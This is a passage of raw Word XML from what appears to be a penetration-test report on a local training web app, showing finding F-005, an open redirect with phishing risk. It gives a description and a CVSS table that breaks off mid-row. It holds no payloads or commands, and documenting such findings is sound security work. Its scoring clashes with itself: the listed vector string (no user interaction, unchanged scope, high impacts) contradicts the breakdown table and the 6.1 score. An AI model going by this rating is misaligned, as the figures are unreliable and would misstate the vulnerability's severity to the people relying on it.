        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="077ED762" w14:textId="1C1BFBA6">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="2D3A73C8" w14:textId="252EC489">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="64EFDCFF" w14:textId="2F48F4B1">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="1B5887EC" w14:textId="2A73CC01">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="01EE83C6" w14:textId="47B6A918">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="0D564243" w14:textId="192DC4AD">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="3FD99747" w14:textId="336767D2">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="3ED85F44" w14:textId="0652904D">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="6A1EAF91" w14:textId="0EA74DFB">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="58C47EB1" w14:textId="240BA36D">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="47810508" w14:textId="4B7016F3">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="0A5ECA0B" w14:textId="72E90053">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="7C8BEC32" w14:textId="233FAFA1">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="09873D59" w14:textId="66774F74">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="78511039" w14:textId="2C5E8174">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="779E3B88" w14:textId="21160DA3">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="0C0E8DF9" w14:textId="1B12CA6F">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="62D75FDB" w14:paraId="36E24BE0" w14:textId="4A1424ED">
      <w:pPr>
        <w:pageBreakBefore/>
        <w:shd w:val="clear" w:color="auto" w:fill="2E5FA3"/>
        <w:spacing w:before="200" w:after="100"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-00</w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B" w:rsidR="7E711AD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  </w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B" w:rsidR="009F40E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Open HTTP Redirect Leading to Malicious External Redirection and Phishing Risk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="086ADA52" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>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200"/>
        <w:gridCol w:w="7160"/>
      </w:tblGrid>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="2CE3F1F3"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3C25CFFA" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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5FB5460F" w:rsidRDefault="5FB5460F" w14:paraId="011B9394" w14:textId="5AA1FBE9">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open HTTP Redirect Leading to Malicious External Redirection and Phishing Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="62E76B20"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7D0A03DC" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FADBD8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="17E05476" w:rsidP="485EA61B" w:rsidRDefault="17E05476" w14:paraId="41C550FD" w14:textId="09E918DE">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="4E0DDB19"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7254EF78" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score</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7B6AEBBF" w:rsidP="485EA61B" w:rsidRDefault="7B6AEBBF" w14:paraId="57A13B2E" w14:textId="69631B9D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="695542F1"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28C4279A" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector</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485EA61B" w:rsidRDefault="485EA61B" w14:paraId="5C00828A" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="229E800B"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441F17DD" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Category</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019E5A71" w:rsidP="485EA61B" w:rsidRDefault="019E5A71" w14:paraId="07AE3BFC" w14:textId="21E10FA8">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A01: Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="27377472" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="75C4D6E3" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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tcPr>
          <w:p w:rsidR="371C8CD8" w:rsidRDefault="371C8CD8" w14:paraId="1DCD34D4" w14:textId="00425091">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http://localhost:4280/vulnerabilities/open_redirect/</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http://localhost:4280/vulnerabilities/open_redirect/source/low.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="4C6006F7" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="62D75FDB" w14:paraId="51A85C65" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="215FA13F" w14:paraId="59A751D9" w14:textId="4ECE0960">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The application was found vulnerable to an Open HTTP Redirect vulnerability in the redirection functionality. During testing, it was observed that the application accepts a user-controlled redirect destination parameter without proper validation or restriction. By modifying the redirect target, an attacker can force users to be redirected from the trusted application domain to an arbitrary attacker-controlled external website. Because the redirect originates from a legitimate application URL, users may trust the link and unknowingly interact with malicious phishing pages, credential harvesting portals, or malware-hosting websites. This demonstrates insufficient validation of redirect destinations and weak trust boundary enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="79A1DD98" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="62D75FDB" w14:paraId="747F041B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>CVSS Breakdown</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-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2160"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="7A6FCA07" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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2A112E66" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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0B76F381" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A2B4A" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="1A2B4A" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="1A2B4A" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="1A2B4A" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A2B4A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="22FEC1A9" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="0CF90016"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2B3512A0" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Version</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2C21480D" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.1</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41D8B183" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Common Vulnerability Scoring System version used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="21B63551"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0B314093" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector (AV)</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67B6029D" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N (Network)</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4F1E08FD" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The vulnerability can be exploited remotely over a network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="52F2389E"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013B3257" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity (AC)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72603212" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>L (Low)</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4B55570B" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation is straightforward and does not require special conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="0A88582E"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33AFDBAF" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required (PR)</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4C113118" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N (None)</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642E0300" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No authentication or prior access is required to exploit the vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="62CFD43A"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647B6E06" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction (UI)</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8B96445" w:rsidRDefault="08B96445" w14:paraId="10CF2BEF" w14:textId="27CA1DF8">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>R (Required)</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08B96445" w:rsidRDefault="08B96445" w14:paraId="5E0145B1" w14:textId="7A046BC3">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A victim must click a crafted malicious link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="7FE9995E"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38988467" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope (S)</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3F27C06E" w:rsidRDefault="3F27C06E" w14:paraId="1FEA0696" w14:textId="015C76D4">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="71CC2DFC">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>hanged)</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2287283E" w:rsidRDefault="2287283E" w14:paraId="1FB83416" w14:textId="5A1ED3AC">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation impacts systems beyond the application boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="748EBDB7"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2DC09D3E" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality Impact (C)</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5232DF2" w:rsidP="485EA61B" w:rsidRDefault="45232DF2" w14:paraId="67A90141" w14:textId="57DDE9F9">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="009F3EB1">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</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202B986D" w:rsidRDefault="202B986D" w14:paraId="12E341AD" w14:textId="6A6F4AEF">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Victim data may be exposed indirectly through phishing or credential theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="4698C701"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49C65A08" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity Impact (I)</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5893F5E" w:rsidRDefault="45893F5E" w14:paraId="0D61E397" w14:textId="7741B0C0">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">L (Low) </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5893F5E" w:rsidRDefault="45893F5E" w14:paraId="2A39C36D" w14:textId="565133AA">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Users may be redirected to attacker-controlled content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="0F2926E3"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485EA61B" w:rsidRDefault="485EA61B" w14:paraId="7AE84567" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability Impact (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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76C29E4D" w:rsidP="485EA61B" w:rsidRDefault="76C29E4D" w14:paraId="76AA81F9" w14:textId="294545AE">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
